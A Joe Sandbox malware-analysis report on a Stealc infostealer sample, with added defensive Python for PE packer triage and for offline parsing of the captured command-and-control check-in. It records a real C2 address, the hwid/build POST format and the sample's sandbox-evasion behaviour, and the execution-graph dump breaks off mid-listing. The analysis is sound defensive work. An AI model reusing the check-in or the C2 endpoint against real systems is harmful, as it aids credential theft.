                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus / scanner results for the sample

Source     Detection   Scanner          Label
file.exe   47%         ReversingLabs    Win32.Trojan.Generic
file.exe   100%        Avira            TR/Crypt.TPM.Gen
file.exe   100%        Joe Sandbox ML

No antivirus matches for dropped files, unpacked PE files or domains.

Antivirus / scanner results for URLs

Source                                        Detection   Scanner          Label
http://185.215.113.37/                        100%        URL Reputation   malware
http://185.215.113.37                         100%        URL Reputation   malware
http://185.215.113.37/e2b1563c6670f193.php    100%        URL Reputation   malware
Contacted domains: none.

Contacted URLs

Name                                          Malicious   Antivirus detection        Reputation
http://185.215.113.37/                        true        URL Reputation: malware    unknown
http://185.215.113.37/e2b1563c6670f193.php    true        URL Reputation: malware    unknown

URLs found in process memory (all in file.exe, all marked malicious, reputation unknown)

• http://185.215.113.37RD
  Source: 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp
• http://185.215.113.37/e2b1563c6670f193.php=h
  Source: 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp
• http://185.215.113.37 (URL Reputation: malware)
  Source: 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp
• http://185.215.113.37/e2b1563c6670f193.php%hh
  Source: 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp
• http://185.215.113.37/e2b1563c6670f193.phpft
  Source: 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp

The trailing characters RD, =h, %hh and ft are adjacent memory bytes picked up by string carving; the HTTP capture below shows the request path as /e2b1563c6670f193.php without them.
Contacted IPs

IP                Domain    Country    ASN       ASN name                 Malicious
185.215.113.37    unknown   Portugal   206894    WHOLESALECONNECTIONSNL   true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529037
Start date and time: 2024-10-08 15:41:21 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 20
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                        No simulations
Context (IPs and ASNs)

The IP 185.215.113.37 and its ASN WHOLESALECONNECTIONSNL each match ten earlier Joe Sandbox submissions, all named file.exe and all detected as malicious: six classified Stealc and four classified Stealc, Vidar. In the IP context every one of them contacted 185.215.113.37/e2b1563c6670f193.php; in the ASN context every one of them contacted 185.215.113.37. The SHA-256 and report-link columns of these tables were not extracted.

No context for domains, JA3 fingerprints or dropped files.
                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9486820090938775
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'836'544 bytes
MD5: 9d007dc0dc48fd402f13f65547d002f3
SHA1: 487a3e42ebc95babcc96a71388fd35577290302d
SHA256: 6bc02402cb6ca77ef60e9e04ed1996840e9eb6088a0b9f748653d63f915edb0a
SHA512: 265518065ac2249fe901d732921309c77e038da613ea5b3375a815e726ff2fd645b2d6c15d90f5d5dcdbeda07137e0717c68fddf1421941f72733b08a6e7f0fb
SSDEEP: 49152:x4j7Euaf4lkIKCj1vkIDSoJU5uYYHBHtdM:ZuCdC59ouj3
TLSH: 5D8533334CA169C2C9B19ABB3A5231D87C44B48E01B17EB57FB5A02CD6437D4763A7B8
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa97000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, RVA 0x697000 in .taggant)

jmp 00007F3F247B2FDAh
pmulhuw mm3, qword ptr [ebx]

The 97 instructions that follow in the listing decode almost entirely zero bytes (`add byte ptr [eax], al`), with a handful of data bytes scattered among them (`add cl, ch`, `add byte ptr [eax], ah`, `or al, byte ptr [eax]`, `add byte ptr [eax], 00000000h`, `adc byte ptr [eax], al`, `pop es`). Nothing after the unconditional jmp is reachable sequentially; the bytes are padding and data, not code.
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Data directories

Name                                Virtual address   Size    Section
IMAGE_DIRECTORY_ENTRY_IMPORT        0x25d050          0x64    .idata
IMAGE_DIRECTORY_ENTRY_BASERELOC     0x25d1f8          0x8     .idata

All other directories (EXPORT, RESOURCE, EXCEPTION, SECURITY, DEBUG, COPYRIGHT, GLOBALPTR, TLS, LOAD_CONFIG, BOUND_IMPORT, IAT, DELAY_IMPORT, COM_DESCRIPTOR, RESERVED) have address 0x0 and size 0x0.
Sections

Name       Virtual address   Virtual size   Raw size   MD5                                Xored PE   ZLIB complexity       File type              Entropy               Characteristics
(none)     0x1000            0x25b000       0x22800    447946d7970a678b25cf4c915fa3caf9   unknown    unknown               unknown                unknown               IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc      0x25c000          0x1000         0x0        d41d8cd98f00b204e9800998ecf8427e   False      0                     empty                  0.0                   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata     0x25d000          0x1000         0x200      c60c4959cc8d384ac402730cc6842bb0   False      0.1328125             data                   0.9064079259880791    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(none)     0x25e000          0x29d000       0x200      53f1b6562bba607c70129fb73393c7fb   unknown    unknown               unknown                unknown               IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iovqbmaf   0x4fb000          0x19b000       0x19a400   a09c56ad4e6fcf5736ad1417bd9f64d9   False      0.9948017834018891    data                   7.9538207256362705    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tgzswadw   0x696000          0x1000         0x400      1c8e7c49498cc5e85143d91f9c4ee53e   False      0.763671875           data                   6.064656695273445     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant   0x697000          0x3000         0x2200     e1d8eb5969ea152bbfdfcd8224b025f5   False      0.061810661764705885  DOS executable (COM)   0.7212457865960206    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Two sections carry no name, five are readable, writable and executable at once, the entry point sits in .taggant rather than a code section, iovqbmaf (almost the whole file) has entropy 7.95, and the second unnamed section reserves 0x29d000 bytes of virtual space for 0x200 bytes on disk. The .rsrc MD5 d41d8cd98f00b204e9800998ecf8427e is the MD5 of empty input, matching its raw size of 0.
Imports

DLL            Import
kernel32.dll   lstrcpy (the only static import)
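To check other samples for the section-table indicators listed above (entry point outside a code section, unnamed and RWX sections, a tiny raw size against a large virtual size, an empty .rsrc, high entropy), the following Python is an added example, not Joe Sandbox code. It assembles a minimal PE32 in memory whose section names, RVAs, rights and entry point copy this report's layout, but whose contents are synthetic filler (seeded random bytes and zero padding; the real file's bytes are not reproduced and tgzswadw is left out), then parses the section table the way a triage script would and reports the indicators. The thresholds (entropy above 7.0, virtual size more than eight times raw size) are my own choices, not values from the report.

```python
"""Section-table triage for the packer indicators seen on file.exe.
Added example, not Joe Sandbox code: the PE32 image is constructed in memory,
layout from the report, contents synthetic."""
import math
import random
import struct

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
FILE_ALIGN = 0x200
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for an empty section (the report's .rsrc)."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_pe32(sections, entry_rva, image_base=0x400000):
    """Assemble DOS header, NT headers, section table and raw section data.
    sections: list of (name, rva, virtual_size, raw_bytes, characteristics)."""
    size_of_headers = 0x400
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                 # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)  # section / file alignment
    struct.pack_into("<I", opt, 60, size_of_headers)
    struct.pack_into("<I", opt, 92, 16)                  # NumberOfRvaAndSizes
    table, blobs, ptr = bytearray(), bytearray(), size_of_headers
    for name, rva, vsize, raw, chars in sections:
        raw = raw + b"\0" * (-len(raw) % FILE_ALIGN)     # pad to file alignment
        table += struct.pack(SECTION_HDR, name.encode(), vsize, rva, len(raw),
                             ptr if raw else 0, 0, 0, 0, 0, chars)
        blobs += raw
        ptr += len(raw)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return headers + b"\0" * (size_of_headers - len(headers)) + bytes(blobs)


def parse_sections(image: bytes):
    """Return (entry_rva, [section dicts]) read straight from the headers."""
    e_lfanew = struct.unpack_from("<I", image, 60)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    count = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    sections = []
    for i in range(count):
        name, vsize, rva, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, image, opt + opt_size + 40 * i)
        raw = image[rptr:rptr + rsize] if rsize else b""
        bare = name.rstrip(b"\0")
        sections.append({
            "label": bare.decode("ascii", "replace") or f"<unnamed #{i}>",
            "named": bool(bare), "rva": rva, "vsize": vsize, "raw_size": rsize,
            "chars": chars, "entropy": shannon_entropy(raw),
            # VirtualSize can be 0 in hand-built files, so use the larger extent
            "has_entry": rva <= entry_rva < rva + max(vsize, rsize),
        })
    return entry_rva, sections


def triage(image: bytes) -> dict:
    """The indicators a packer-aware analyst checks before running anything."""
    _, secs = parse_sections(image)
    entry = next((s for s in secs if s["has_entry"]), None)
    return {
        "entry_section": entry["label"] if entry else None,
        "entry_outside_text": entry is None or entry["label"] not in (".text", "CODE"),
        "rwx_sections": [s["label"] for s in secs if s["chars"] & RWX == RWX],
        "unnamed_sections": sum(1 for s in secs if not s["named"]),
        "high_entropy": [s["label"] for s in secs if s["entropy"] > 7.0],
        # large virtual extent over a tiny raw footprint: room for unpacked code
        "unpack_targets": [s["label"] for s in secs
                           if s["raw_size"] and s["vsize"] > 8 * s["raw_size"]],
        "empty_sections": [s["label"] for s in secs if s["raw_size"] == 0],
    }


def sample_image() -> bytes:
    """Constructed stand-in for file.exe's layout (synthetic contents)."""
    rnd, d = random.Random(7), IMAGE_SCN_CNT_INITIALIZED_DATA
    return build_pe32([
        ("",         0x001000, 0x25B000, rnd.randbytes(0x400),        d | RWX),
        (".rsrc",    0x25C000, 0x001000, b"",                         d | RW),
        (".idata",   0x25D000, 0x001000, b"kernel32.dll\0lstrcpy\0",  d | RW),
        ("",         0x25E000, 0x29D000, b"\0" * 0x200,               d | RWX),
        ("iovqbmaf", 0x4FB000, 0x002000, rnd.randbytes(0x2000),       d | RWX),
        (".taggant", 0x697000, 0x003000, b"\xE9" + b"\0" * 0xFFF,     d | RWX),
    ], entry_rva=0x697000)


if __name__ == "__main__":
    for key, value in triage(sample_image()).items():
        print(f"{key:20} {value}")
```

`parse_sections` and `triage` take any PE32 image as bytes, so the same code runs on a real file read from disk; `sample_image` exists only so the example runs offline. The entry-point check uses the larger of virtual and raw size because packers often leave one of the two at zero.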
Suricata IDS alert

Timestamp                         SID       Signature                                         Severity   Source IP     Src port   Dest IP          Dst port   Protocol
2024-10-08T15:42:15.749488+0200   2044243   ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in   1          192.168.2.6   49710      185.215.113.37   80         TCP

TCP packets (192.168.2.6:49710 <-> 185.215.113.37:80, all times CEST on Oct 8, 2024)

Timestamp              Direction
15:42:14.810719967     client -> server
15:42:14.815921068     server -> client
15:42:14.816005945     client -> server
15:42:14.819689989     client -> server   (GET / sent)
15:42:14.824657917     server -> client
15:42:15.504110098     server -> client   (200 OK, empty body)
15:42:15.504216909     client -> server
15:42:15.520028114     client -> server   (POST /e2b1563c6670f193.php sent)
15:42:15.524876118     server -> client
15:42:15.749420881     server -> client   (200 OK, 8-byte body; Suricata alert fires)
15:42:15.749488115     client -> server
15:42:17.989805937     client -> server
Contacted IP: 185.215.113.37

HTTP session

Session ID   Source IP     Src port   Destination IP   Dst port   PID    Process
0            192.168.2.6   49710      185.215.113.37   80         1824   C:\Users\user\Desktop\file.exe

Oct 8, 2024 15:42:14.819689989 CEST, 89 bytes OUT:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 8, 2024 15:42:15.504110098 CEST, 203 bytes IN:
HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:42:15 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 8, 2024 15:42:15.520028114 CEST, 411 bytes OUT:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI
Host: 185.215.113.37
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache

------EHCBAAAFHJDHJJKEBGHI
Content-Disposition: form-data; name="hwid"

FB73C9105E5F552815863
------EHCBAAAFHJDHJJKEBGHI
Content-Disposition: form-data; name="build"

doma
------EHCBAAAFHJDHJJKEBGHI--

(Body shown with the CR LF line breaks from the raw hex dump in the report; the hex encodes exactly this text and is omitted. The two form fields are hwid = FB73C9105E5F552815863 and build = doma.)

Oct 8, 2024 15:42:15.749420881 CEST, 210 bytes IN:
HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:42:15 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

YmxvY2s=

(The 8-byte body is base64 for "block". Both requests reuse the same keep-alive connection, and no further HTTP request appears in the capture after this reply.)
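The check-in above can be decoded and checked offline. The Python below is an added example, not Joe Sandbox output and not Stealc code: REQUEST and RESPONSE are rebuilt inline from the captured headers and hex dump (their lengths, 411 and 210 bytes, match the capture), nothing is sent to the network. It splits each HTTP message, parses the multipart body with a small RFC 7578 reader, checks the declared Content-Length against the body actually sent, and base64-decodes the reply. The final `looks_like_stealc_checkin` test is a heuristic of my own for triaging pcaps, not the content of Suricata rule 2044243, which is not on this page.

```python
"""Decode the Stealc check-in captured above.
Added example, not Joe Sandbox output: REQUEST and RESPONSE are reconstructed
from the report's headers and hex dump; nothing is sent over the network."""
import base64
import re

BOUNDARY = b"----EHCBAAAFHJDHJJKEBGHI"
REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 210\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------EHCBAAAFHJDHJJKEBGHI\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"FB73C9105E5F552815863\r\n"
    b"------EHCBAAAFHJDHJJKEBGHI\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------EHCBAAAFHJDHJJKEBGHI--\r\n"
)
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 08 Oct 2024 13:42:15 GMT\r\n"
    b"Server: Apache/2.4.52 (Ubuntu)\r\n"
    b"Content-Length: 8\r\n"
    b"Keep-Alive: timeout=5, max=99\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"YmxvY2s="
)


def split_http(message: bytes):
    """Return (start line, {lower-cased header: value}, body)."""
    head, _, body = message.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, body


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Minimal multipart/form-data reader: split on the delimiter, take the
    field name from Content-Disposition, keep the value up to the next CR LF."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):            # closing delimiter: boundary + "--"
            break
        part_headers, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_headers)
        if match:
            fields[match.group(1).decode()] = value.rstrip(b"\r\n").decode("utf-8", "replace")
    return fields


def triage_checkin(request: bytes, response: bytes) -> dict:
    """Summarise one request/response pair the way an analyst reads the capture."""
    req_line, req_headers, req_body = split_http(request)
    boundary = re.search(r"boundary=([^;]+)", req_headers.get("content-type", ""))
    fields = parse_multipart(req_body, boundary.group(1).encode()) if boundary else {}
    declared = int(req_headers.get("content-length", "0"))
    status, _, resp_body = split_http(response)
    try:                                      # strict decode: reject anything not base64
        decoded = base64.b64decode(resp_body, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        decoded = None
    path = req_line.split()[1] if len(req_line.split()) > 1 else ""
    return {
        "method_path": req_line.rsplit(" ", 1)[0],
        "host": req_headers.get("host"),
        "fields": fields,
        "body_length_ok": declared == len(req_body),
        "response_status": status,
        "response_decoded": decoded,
        # heuristic of my own: POST to a .php path carrying exactly hwid and build,
        # answered with a short base64 token
        "looks_like_stealc_checkin": (
            req_line.startswith("POST ") and path.endswith(".php")
            and set(fields) == {"hwid", "build"}
            and decoded is not None and len(decoded) < 64
        ),
    }


if __name__ == "__main__":
    for key, value in triage_checkin(REQUEST, RESPONSE).items():
        print(f"{key:26} {value!r}")
```

`triage_checkin` works on any request/response pair pulled from a pcap (for example with tshark's `-z follow,tcp,raw` output), so the same function can be run over every session in a capture to find hosts that sent the hwid/build pair.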


Target ID: 0
Start time: 09:42:10
Start date: 08/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x160000 (relocated from the preferred 0x400000; the image is marked DYNAMIC_BASE)
File size: 1'836'544 bytes
MD5 hash: 9D007DC0DC48FD402F13F65547D002F3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Execution Graph (the rendered graph did not survive extraction; its statistics and the API calls named in the node dump are kept)

Execution Coverage: 8.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 25

API calls named in the node dump: RtlAllocateHeap and VirtualProtect (a helper at 0x1645c0 called dozens of times in a row), GetPEB, LoadLibraryA (five calls) followed by a chain of GetProcAddress calls (runtime API resolution), lstrcpy, lstrlen, lstrcat, GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, GlobalMemoryStatusEx, GetUserDefaultLangID (followed by five separate ExitProcess branches), GetProcessHeap, GetUserNameA, GetComputerNameA, OpenEventA, CreateEventA, CloseHandle, Sleep, GetSystemTime, sscanf, SystemTimeToFileTime (twice, with an ExitProcess branch), GetWindowsDirectoryA, InternetOpenA, and ExitProcess at several further points; the CRT helpers codecvt and __aulldiv also appear. The pattern of environment checks (system info, memory, NUMA allocation, language ID, system time) each guarded by ExitProcess matches the evasive-API-chain signatures listed for this sample.
13947->13948 13949 1645c0 2 API calls 13948->13949 13950 1629bb 13949->13950 13951 1645c0 2 API calls 13950->13951 13952 1629d4 13951->13952 13953 1645c0 2 API calls 13952->13953 13954 1629ed 13953->13954 13955 1645c0 2 API calls 13954->13955 13956 162a06 13955->13956 13957 1645c0 2 API calls 13956->13957 13958 162a1f 13957->13958 13959 1645c0 2 API calls 13958->13959 13960 162a38 13959->13960 13961 1645c0 2 API calls 13960->13961 13962 162a51 13961->13962 13963 1645c0 2 API calls 13962->13963 13964 162a6a 13963->13964 13965 1645c0 2 API calls 13964->13965 13966 162a83 13965->13966 13967 1645c0 2 API calls 13966->13967 13968 162a9c 13967->13968 13969 1645c0 2 API calls 13968->13969 13970 162ab5 13969->13970 13971 1645c0 2 API calls 13970->13971 13972 162ace 13971->13972 13973 1645c0 2 API calls 13972->13973 13974 162ae7 13973->13974 13975 1645c0 2 API calls 13974->13975 13976 162b00 13975->13976 13977 1645c0 2 API calls 13976->13977 13978 162b19 13977->13978 13979 1645c0 2 API calls 13978->13979 13980 162b32 13979->13980 13981 1645c0 2 API calls 13980->13981 13982 162b4b 13981->13982 13983 1645c0 2 API calls 13982->13983 13984 162b64 13983->13984 13985 1645c0 2 API calls 13984->13985 13986 162b7d 13985->13986 13987 1645c0 2 API calls 13986->13987 13988 162b96 13987->13988 13989 1645c0 2 API calls 13988->13989 13990 162baf 13989->13990 13991 1645c0 2 API calls 13990->13991 13992 162bc8 13991->13992 13993 1645c0 2 API calls 13992->13993 13994 162be1 13993->13994 13995 1645c0 2 API calls 13994->13995 13996 162bfa 13995->13996 13997 1645c0 2 API calls 13996->13997 13998 162c13 13997->13998 13999 1645c0 2 API calls 13998->13999 14000 162c2c 13999->14000 14001 1645c0 2 API calls 14000->14001 14002 162c45 14001->14002 14003 1645c0 2 API calls 14002->14003 14004 162c5e 14003->14004 14005 1645c0 2 API calls 14004->14005 14006 162c77 14005->14006 14007 1645c0 2 API calls 14006->14007 14008 162c90 14007->14008 14009 1645c0 2 API calls 14008->14009 14010 162ca9 14009->14010 
14011 1645c0 2 API calls 14010->14011 14012 162cc2 14011->14012 14013 1645c0 2 API calls 14012->14013 14014 162cdb 14013->14014 14015 1645c0 2 API calls 14014->14015 14016 162cf4 14015->14016 14017 1645c0 2 API calls 14016->14017 14018 162d0d 14017->14018 14019 1645c0 2 API calls 14018->14019 14020 162d26 14019->14020 14021 1645c0 2 API calls 14020->14021 14022 162d3f 14021->14022 14023 1645c0 2 API calls 14022->14023 14024 162d58 14023->14024 14025 1645c0 2 API calls 14024->14025 14026 162d71 14025->14026 14027 1645c0 2 API calls 14026->14027 14028 162d8a 14027->14028 14029 1645c0 2 API calls 14028->14029 14030 162da3 14029->14030 14031 1645c0 2 API calls 14030->14031 14032 162dbc 14031->14032 14033 1645c0 2 API calls 14032->14033 14034 162dd5 14033->14034 14035 1645c0 2 API calls 14034->14035 14036 162dee 14035->14036 14037 1645c0 2 API calls 14036->14037 14038 162e07 14037->14038 14039 1645c0 2 API calls 14038->14039 14040 162e20 14039->14040 14041 1645c0 2 API calls 14040->14041 14042 162e39 14041->14042 14043 1645c0 2 API calls 14042->14043 14044 162e52 14043->14044 14045 1645c0 2 API calls 14044->14045 14046 162e6b 14045->14046 14047 1645c0 2 API calls 14046->14047 14048 162e84 14047->14048 14049 1645c0 2 API calls 14048->14049 14050 162e9d 14049->14050 14051 1645c0 2 API calls 14050->14051 14052 162eb6 14051->14052 14053 1645c0 2 API calls 14052->14053 14054 162ecf 14053->14054 14055 1645c0 2 API calls 14054->14055 14056 162ee8 14055->14056 14057 1645c0 2 API calls 14056->14057 14058 162f01 14057->14058 14059 1645c0 2 API calls 14058->14059 14060 162f1a 14059->14060 14061 1645c0 2 API calls 14060->14061 14062 162f33 14061->14062 14063 1645c0 2 API calls 14062->14063 14064 162f4c 14063->14064 14065 1645c0 2 API calls 14064->14065 14066 162f65 14065->14066 14067 1645c0 2 API calls 14066->14067 14068 162f7e 14067->14068 14069 1645c0 2 API calls 14068->14069 14070 162f97 14069->14070 14071 1645c0 2 API calls 14070->14071 14072 162fb0 14071->14072 14073 1645c0 2 
API calls 14072->14073 14074 162fc9 14073->14074 14075 1645c0 2 API calls 14074->14075 14076 162fe2 14075->14076 14077 1645c0 2 API calls 14076->14077 14078 162ffb 14077->14078 14079 1645c0 2 API calls 14078->14079 14080 163014 14079->14080 14081 1645c0 2 API calls 14080->14081 14082 16302d 14081->14082 14083 1645c0 2 API calls 14082->14083 14084 163046 14083->14084 14085 1645c0 2 API calls 14084->14085 14086 16305f 14085->14086 14087 1645c0 2 API calls 14086->14087 14088 163078 14087->14088 14089 1645c0 2 API calls 14088->14089 14090 163091 14089->14090 14091 1645c0 2 API calls 14090->14091 14092 1630aa 14091->14092 14093 1645c0 2 API calls 14092->14093 14094 1630c3 14093->14094 14095 1645c0 2 API calls 14094->14095 14096 1630dc 14095->14096 14097 1645c0 2 API calls 14096->14097 14098 1630f5 14097->14098 14099 1645c0 2 API calls 14098->14099 14100 16310e 14099->14100 14101 1645c0 2 API calls 14100->14101 14102 163127 14101->14102 14103 1645c0 2 API calls 14102->14103 14104 163140 14103->14104 14105 